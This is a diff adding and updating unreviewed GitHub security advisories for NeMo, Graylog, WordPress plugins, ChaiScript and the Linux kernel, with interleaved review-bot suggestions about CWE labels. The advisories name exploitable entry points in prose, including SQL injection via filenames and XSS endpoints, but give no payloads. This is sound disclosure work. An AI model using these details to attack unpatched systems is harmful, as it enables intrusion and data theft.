diff --git a/advisories/unreviewed/2026/02/GHSA-25w3-5rm9-v4wm/GHSA-25w3-5rm9-v4wm.json b/advisories/unreviewed/2026/02/GHSA-25w3-5rm9-v4wm/GHSA-25w3-5rm9-v4wm.json new file mode 100644 index 0000000000000..2addfc455c227 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-25w3-5rm9-v4wm/GHSA-25w3-5rm9-v4wm.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-25w3-5rm9-v4wm", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33246" + ], + "details": "NVIDIA NeMo Framework for all platforms contains a vulnerability in the ASR Evaluator utility, where a user could cause a command injection by supplying crafted input to a configuration parameter. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, or information disclosure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33246" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33246" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2cpx-h862-rqm6/GHSA-2cpx-h862-rqm6.json b/advisories/unreviewed/2026/02/GHSA-2cpx-h862-rqm6/GHSA-2cpx-h862-rqm6.json new file mode 100644 index 0000000000000..a1c64fdff3b74 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2cpx-h862-rqm6/GHSA-2cpx-h862-rqm6.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cpx-h862-rqm6", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33243" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution in distributed environments. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33243" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33243" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json b/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json new file mode 100644 index 0000000000000..f16f154739d21 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3crm-x896-j73p", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1435" + ], + "details": "Not properly invalidated session vulnerability in Graylog Web Interface, version 2.2.3, due to incorrect management of session invalidation after new logins. The application generates a new 'sessionId' each time a user authenticates, but does not invalidate previously issued session identifiers, which remain valid even after multiple consecutive logins by the same user. As a result, a stolen or leaked 'sessionId' can continue to be used to authenticate valid requests. Exploiting this vulnerability would allow an attacker with access to the web service/API network (port 9000 or HTTP/S endpoint of the server) to reuse an old session token to gain unauthorized access to the application, interact with the API/web, and compromise the integrity of the affected account.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1435" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-613" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json b/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json new file mode 100644 index 0000000000000..92410cc1fc832 --- /dev/null 
+++ b/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47m2-7g75-xvrp", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1440" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/pipelines/' endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1440" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json b/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json new file mode 100644 index 0000000000000..3e7b6867826cb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json 
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-49xw-73mm-8fw9",
+ "modified": "2026-02-18T15:31:26Z",
+ "published": "2026-02-18T15:31:26Z",
+ "aliases": [
+ "CVE-2026-1439"
+ ],
+ "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/\n\nalerts\n\n/' endpoint.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1439"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T14:16:06Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json b/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json
index 406dcef173473..bd3247190334c 100644
--- a/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json
+++ b/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json
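Review bot: The endpoint named at the end of `details` in GHSA-49xw-73mm-8fw9 is broken up by escaped newlines (`'/\n\nalerts\n\n/'`), so the affected path cannot be read or searched as a single token. The sibling Graylog record GHSA-47m2-7g75-xvrp in this sync writes its path inline as `'/system/pipelines/'`, so this one presumably should read `'/alerts/'`. Anyone deriving a filter or log query from the advisory text should normalise the string first. The double space before the opening quote can be dropped in the same edit.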
@@ -41,7 +41,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-119" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-54p7-3rpx-pjfc/GHSA-54p7-3rpx-pjfc.json b/advisories/unreviewed/2026/02/GHSA-54p7-3rpx-pjfc/GHSA-54p7-3rpx-pjfc.json new file mode 100644 index 0000000000000..ad028655b3deb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-54p7-3rpx-pjfc/GHSA-54p7-3rpx-pjfc.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-54p7-3rpx-pjfc", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2026-1317" + ], + "details": "The WP Import – Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 7.37. This is due to insufficient escaping on the `file_name` parameter which is stored in the database during file upload and later used in raw SQL queries without proper sanitization. This makes it possible for authenticated attackers with Subscriber-level access or higher to append additional SQL queries into already existing queries via a malicious filename, which can be used to extract sensitive information from the database. The vulnerability can only be exploited when the 'Single Import/Export' option is enabled, and the server is running a PHP version < 8.0.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1317" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/tags/7.34/managerExtensions/LogManager.php#L763" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/tags/7.34/uploadModules/UrlUpload.php#L181" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3445414" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fd80133d-03c7-4ecb-ad2c-98950f788ca6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:20Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json b/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json index 85d2b669e2761..38232cd095362 100644 --- a/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json +++ b/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-568p-hhxc-vvx8", - "modified": "2026-02-18T06:30:19Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-18T06:30:19Z", "aliases": [ "CVE-2026-1368" ], "details": "The Video Conferencing with Zoom WordPress plugin before 4.6.6 contains an AJAX handler that has its nonce verification commented out, allowing unauthenticated attackers to generate valid Zoom SDK signatures for any meeting ID and retrieve the site's Zoom SDK key.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T06:16:34Z" diff --git a/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json b/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json index 8b64705509c5c..3fe6391c73d04 100644 --- a/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json +++ b/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-200" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, 
diff --git a/advisories/unreviewed/2026/02/GHSA-5g82-gg27-r8vp/GHSA-5g82-gg27-r8vp.json b/advisories/unreviewed/2026/02/GHSA-5g82-gg27-r8vp/GHSA-5g82-gg27-r8vp.json index d65089f4f0cde..97ce98067f1f6 100644 --- a/advisories/unreviewed/2026/02/GHSA-5g82-gg27-r8vp/GHSA-5g82-gg27-r8vp.json +++ b/advisories/unreviewed/2026/02/GHSA-5g82-gg27-r8vp/GHSA-5g82-gg27-r8vp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5g82-gg27-r8vp", - "modified": "2026-02-16T18:31:28Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-16T18:31:28Z", "aliases": [ "CVE-2025-65715" ], "details": "An issue in the code-runner.executorMap setting of Visual Studio Code Extensions Code Runner v0.12.2 allows attackers to execute arbitrary code when opening a crafted workspace.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-16T16:19:17Z" diff --git a/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json b/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json new file mode 100644 index 0000000000000..57e5554fcf326 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5hp8-hwcv-h225", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1437" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the '/system/authentication/users/edit/' endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1437" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5rm9-pcp8-m6v8/GHSA-5rm9-pcp8-m6v8.json b/advisories/unreviewed/2026/02/GHSA-5rm9-pcp8-m6v8/GHSA-5rm9-pcp8-m6v8.json new file mode 100644 index 0000000000000..3a2b3697d87e9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5rm9-pcp8-m6v8/GHSA-5rm9-pcp8-m6v8.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5rm9-pcp8-m6v8", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33240" + ], + "details": "NVIDIA Megatron Bridge contains a vulnerability in a data shuffling tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33240" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5781" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33240" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json b/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json index 0554f3c56725a..08b97d1d07780 100644 --- a/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json +++ b/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-284" + ], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-6qr6-c44j-c793/GHSA-6qr6-c44j-c793.json b/advisories/unreviewed/2026/02/GHSA-6qr6-c44j-c793/GHSA-6qr6-c44j-c793.json new file mode 100644 index 0000000000000..32324aa90966f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6qr6-c44j-c793/GHSA-6qr6-c44j-c793.json 
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6qr6-c44j-c793",
+ "modified": "2026-02-18T15:31:26Z",
+ "published": "2026-02-18T15:31:26Z",
+ "aliases": [
+ "CVE-2026-2655"
+ ],
+ "details": "A vulnerability was detected in ChaiScript up to 6.1.0. The impacted element is the function chaiscript::str_less::operator of the file include/chaiscript/chaiscript_defines.hpp. The manipulation results in use after free. The attack requires a local approach. The attack requires a high level of complexity. The exploitability is regarded as difficult. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2655"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ChaiScript/ChaiScript/issues/632"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ChaiScript/ChaiScript/issues/632#issue-3827824936"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ChaiScript/ChaiScript"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.346453"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.346453"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.752788"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T14:16:07Z"
+ }
+}
\ No newline at end of file
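Review bot: `cwe_ids` in GHSA-6qr6-c44j-c793 carries only the broad `CWE-119`, while `details` describes the flaw in `chaiscript::str_less::operator` as a use after free. `CWE-416` is the specific weakness for that, and listing it, `"cwe_ids": ["CWE-119", "CWE-416"]`, lets consumers who filter on memory-lifetime bugs find the record. The text also says the exploit is public and the project has not yet responded, and the record names no fixed version, so the `LOW` label should not be read as "no action needed" for anyone embedding ChaiScript up to 6.1.0.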
diff --git a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json index 6e844f0378d15..7b0a56750956f 100644 --- a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json +++ b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-288" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-77vx-jc7r-586m/GHSA-77vx-jc7r-586m.json b/advisories/unreviewed/2026/02/GHSA-77vx-jc7r-586m/GHSA-77vx-jc7r-586m.json new file mode 100644 index 0000000000000..a620971e97821 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-77vx-jc7r-586m/GHSA-77vx-jc7r-586m.json 
@@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-77vx-jc7r-586m", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23219" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/slab: Add alloc_tagging_slab_free_hook for memcg_alloc_abort_single\n\nWhen CONFIG_MEM_ALLOC_PROFILING_DEBUG is enabled, the following warning\nmay be noticed:\n\n[ 3959.023862] ------------[ cut here ]------------\n[ 3959.023891] alloc_tag was not cleared (got tag for lib/xarray.c:378)\n[ 3959.023947] WARNING: ./include/linux/alloc_tag.h:155 at alloc_tag_add+0x128/0x178, CPU#6: mkfs.ntfs/113998\n[ 3959.023978] Modules linked in: dns_resolver tun brd overlay exfat btrfs blake2b libblake2b xor xor_neon raid6_pq loop sctp ip6_udp_tunnel udp_tunnel ext4 crc16 mbcache jbd2 rfkill sunrpc vfat fat sg fuse nfnetlink sr_mod virtio_gpu cdrom drm_client_lib virtio_dma_buf drm_shmem_helper drm_kms_helper ghash_ce drm sm4 backlight virtio_net net_failover virtio_scsi failover virtio_console virtio_blk virtio_mmio dm_mirror dm_region_hash dm_log dm_multipath dm_mod i2c_dev aes_neon_bs aes_ce_blk [last unloaded: hwpoison_inject]\n[ 3959.024170] CPU: 6 UID: 0 PID: 113998 Comm: mkfs.ntfs Kdump: loaded Tainted: G W 6.19.0-rc7+ #7 PREEMPT(voluntary)\n[ 3959.024182] Tainted: [W]=WARN\n[ 3959.024186] Hardware name: QEMU KVM Virtual Machine, BIOS unknown 2/2/2022\n[ 3959.024192] pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 3959.024199] pc : alloc_tag_add+0x128/0x178\n[ 3959.024207] lr : alloc_tag_add+0x128/0x178\n[ 3959.024214] sp : ffff80008b696d60\n[ 3959.024219] x29: ffff80008b696d60 x28: 0000000000000000 x27: 0000000000000240\n[ 3959.024232] x26: 0000000000000000 x25: 0000000000000240 x24: ffff800085d17860\n[ 3959.024245] x23: 0000000000402800 x22: ffff0000c0012dc0 x21: 00000000000002d0\n[ 3959.024257] x20: ffff0000e6ef3318 x19: ffff800085ae0410 x18: 0000000000000000\n[ 
3959.024269] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\n[ 3959.024281] x14: 0000000000000000 x13: 0000000000000001 x12: ffff600064101293\n[ 3959.024292] x11: 1fffe00064101292 x10: ffff600064101292 x9 : dfff800000000000\n[ 3959.024305] x8 : 00009fff9befed6e x7 : ffff000320809493 x6 : 0000000000000001\n[ 3959.024316] x5 : ffff000320809490 x4 : ffff600064101293 x3 : ffff800080691838\n[ 3959.024328] x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff0000d5bcd640\n[ 3959.024340] Call trace:\n[ 3959.024346] alloc_tag_add+0x128/0x178 (P)\n[ 3959.024355] __alloc_tagging_slab_alloc_hook+0x11c/0x1a8\n[ 3959.024362] kmem_cache_alloc_lru_noprof+0x1b8/0x5e8\n[ 3959.024369] xas_alloc+0x304/0x4f0\n[ 3959.024381] xas_create+0x1e0/0x4a0\n[ 3959.024388] xas_store+0x68/0xda8\n[ 3959.024395] __filemap_add_folio+0x5b0/0xbd8\n[ 3959.024409] filemap_add_folio+0x16c/0x7e0\n[ 3959.024416] __filemap_get_folio_mpol+0x2dc/0x9e8\n[ 3959.024424] iomap_get_folio+0xfc/0x180\n[ 3959.024435] __iomap_get_folio+0x2f8/0x4b8\n[ 3959.024441] iomap_write_begin+0x198/0xc18\n[ 3959.024448] iomap_write_iter+0x2ec/0x8f8\n[ 3959.024454] iomap_file_buffered_write+0x19c/0x290\n[ 3959.024461] blkdev_write_iter+0x38c/0x978\n[ 3959.024470] vfs_write+0x4d4/0x928\n[ 3959.024482] ksys_write+0xfc/0x1f8\n[ 3959.024489] __arm64_sys_write+0x74/0xb0\n[ 3959.024496] invoke_syscall+0xd4/0x258\n[ 3959.024507] el0_svc_common.constprop.0+0xb4/0x240\n[ 3959.024514] do_el0_svc+0x48/0x68\n[ 3959.024520] el0_svc+0x40/0xf8\n[ 3959.024526] el0t_64_sync_handler+0xa0/0xe8\n[ 3959.024533] el0t_64_sync+0x1ac/0x1b0\n[ 3959.024540] ---[ end trace 0000000000000000 ]---\n\nWhen __memcg_slab_post_alloc_hook() fails, there are two different\nfree paths depending on whether size == 1 or size != 1. 
In the\nkmem_cache_free_bulk() path, we do call alloc_tagging_slab_free_hook().\nHowever, in memcg_alloc_abort_single() we don't, the above warning will be\ntriggered on the next allocation.\n\nTherefore, add alloc_tagging_slab_free_hook() to the\nmemcg_alloc_abort_single() path.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23219" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b8bc72587c79fe52c14732e16a766b6eded00707" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e6c53ead2d8fa73206e0a63e9cd9aea6bc929837" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e8af57e090790983591f6927b3d89ee6383f8c1e" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-787p-86v4-hhfg/GHSA-787p-86v4-hhfg.json b/advisories/unreviewed/2026/02/GHSA-787p-86v4-hhfg/GHSA-787p-86v4-hhfg.json new file mode 100644 index 0000000000000..521a2d425dac0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-787p-86v4-hhfg/GHSA-787p-86v4-hhfg.json 
